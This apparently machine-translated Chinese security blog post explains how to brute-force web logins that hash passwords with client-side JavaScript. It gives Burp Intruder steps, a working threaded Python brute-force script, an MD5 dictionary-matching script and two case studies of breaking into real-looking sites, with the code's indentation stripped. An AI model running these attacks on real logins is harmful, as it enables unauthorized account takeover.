0x01 Preface
The web login interface is the channel for the website foreground to enter the background. For the login management interface, common web attacks such as SQL injection, XSS, weak password, brute force guessing, etc. This paper mainly makes a simple analysis of the idea of Web brute force guessing, and expounds it with an example of vulnerability.
0x02 thinking
In the web login interface, there are three main elements: user name, password, and verification code. The simplest idea is as follows:
1. Get the user name, including login error prompt, website article editing and signing, social workers, etc
2. Password guessing, an effective dictionary
3. Verification code identification or bypassing, often including separation of verification code and user name password, failure of automatic refreshing of verification code, reusable verification code identification
According to the way HTTP transmits data, it can be roughly divided into two types:
Type 1: plaintext transmission
This is the most popular web application that does not have a verification code or fail to log in. Only the user name and password can log in and directly load the dictionary for blasting. The most common is to use the burp suite Intruder performs violent guessing, and intruder supports a variety of blasting modes: single dictionary blasting, multi field same dictionary blasting, multi dictionary position corresponding blasting, aggregate blasting.
Type 2: front end JS encryption processing
Now, many web applications will use js to encrypt the password during the login process, and then in the sending server, the password obtained by using the proxy tool is the encrypted password, which to a certain extent adds some trouble to our blasting. The following is an analysis of JS encryption blasting.
0x03 JS encrypted blasting
Common JS encryption methods include MD5, Base64 and shal. Here, a simple demo is written as a test.
Login.html
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<title>用户登录</title>
<script type="text/ecmascript" src="md5.js"></script>
<script>
function checkInput() {
var password_input = document.getElementById('password');
var password_md5 = document.getElementById('password_md5');
password_md5.value =hex_md5(password_input.value);
return true;
}
</script>
</head>
<body>
<form action="login.php" method="post" onsubmit="return checkInput()">
用户:<input type="text" id="username" name="username"> <br/>
密码:<input type="password" id="password"> <br/>
<input type="hidden" id="password_md5" name="password">
<input type="submit" value="提交" />
</form>
</body>
</html>
Submit the form and grab the package. You can find that the password in the password field is encrypted:
The common JS MD5 encryption can be processed in two ways: one is to use intruder to support multiple encryption and encoding, and to encrypt the password field; the other is to write Python script. Those familiar with the encryption algorithm can rewrite or directly use the JS file of the website to encrypt the password field.
3.1 Burp Suite Intruder
1. Grab packets and send them to the intruder, mark relevant parameters, and select the fourth mode "cluster bomb"
2. Select the user name dictionary and password dictionary respectively. When setting the password dictionary, select MD5 encryption mode to encrypt the password field
3. Start blasting, judge whether it is successful according to the length of the returned field, and obtain the MD5 value of the user name and password field successfully. Admin: 21232f297a57a5a743894a0e4a801fc3
4. MD5 decrypts successfully and obtains the user name and password admin / Admin
3.2 PyExecJS
Here, Python execjs is used to execute the JS statement and simulate the front end to encrypt the account password
Get ready:
pip install PyExecJS
Phantomjs Download: https://bitbucket.org/aria/phantomjs/downloads/phantomjs-2.1.1-windows.zip
Write Python script to explode:
import requests
import threadpool
from selenium import webdriver
import execjs
def getpass(str):
with open ('md5.js','r') as js:
source = js.read()
phantom = execjs.get('PhantomJS')
getpass = phantom.compile(source)
password = getpass.call('hex_md5',str)
return password
def login(user,passwd):
url="http://127.0.0.1/login.php"
payload ={'username':user,'password':getpass(passwd)}
headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
try:
response = requests.post(url,data=payload,headers=headers,timeout=5)
result=response.content
if result.count('fail')<1:
print '[success] ' +url+":"+user+':'+passwd
except:
pass
def getLines(fileName):
list=[]
with open(fileName, 'r') as fd:
for line in fd.readlines():
line = line.strip()
if not len(line) or line.startswith('#'):
continue
list.append(line)
return list
if __name__ == '__main__':
username_list=getLines('user.dict')
password_list=getLines('pass.dict')
userlist = [([user,passwd],None) for user in username_list for passwd in password_list]
pool = threadpool.ThreadPool(20)
reqs = threadpool.makeRequests(login,userlist)
[pool.putRequest(req) for req in reqs]
pool.wait()
User account password successfully exploded
0x04 vulnerability instance
Here are two examples of loopholes. In actual combat, according to different loopholes, we can flexibly use violence aesthetics, which is simple and extremely destructive.
Vulnerability example 1: unauthorized access to user name + password JS encryption + reuse of verification code
Vulnerability scenario: the homepage of the website contains a login module, including user name, password, and verification code. Normal data is input for testing. It is found that the password is transmitted with JS encryption, and the verification code cannot be refreshed automatically and can be reused.
1. Scan the sensitive files of the website and find that the system has unauthorized access. Through the URL, you can directly access the system background log management module and obtain the user login name.
2. Through the unauthorized user name, load the password dictionary, code the dictionary password, brutally crack it, and successfully blast out the MD5 value corresponding to the password of user TB: 6846860684f05029abccc09a53cd66f1
3. MD5 cracking, the corresponding value of MD5 is: a111111
Tips: sometimes when MD5 cannot be decrypted, what should I do? We know that this MD5 value corresponds to one of our password dictionaries. You can write Python scripts to compare MD5 values.
Python脚本:
!/usr/bin/env python
-- coding: utf-8 --
import hashlib
src='6846860684f05029abccc09a53cd66f1'
def get_line():
f = open('1.txt')
print 'start:'
while True:
line = f.readline().strip()
if len(line)==0:
print 'line 0'
break
m1 = hashlib.md5()
m1.update(line)
tmp =m1.hexdigest()
print line+" :"+tmp
if tmp==src:
print src+u': md5对应的值为:'+line
break
Test screenshot:
5. Through the obtained users and the cracked users, successfully log in the system.
Vulnerability scenario 2: login error prompt + verification code recognizable
1. Enter the user name admin, password, and verification code. You will be prompted that the user name you entered does not exist. Please re-enter it.
2. Using pkav http fuzzer 1.2's verification code identification engine, the verification code can be automatically identified
3. According to the login error prompt, the user name dictionary is loaded for blasting. When the prompt "the password you entered is incorrect, please re-enter", at this time, we get the user name of sysadmin, further load the password dictionary for blasting, and blasting the user password.
People who like this article also like it······
A kind of [code audit] getshell caused by easysns UU v1.6 remote image localization
A kind of [code audit] SQL secondary code injection vulnerability example (with tamper script)
Bypass
About Me
A network security enthusiast has a paranoid pursuit of technology. Committed to sharing original high-quality dry goods, including but not limited to: penetration testing, WAF bypass, code audit, security operation and maintenance.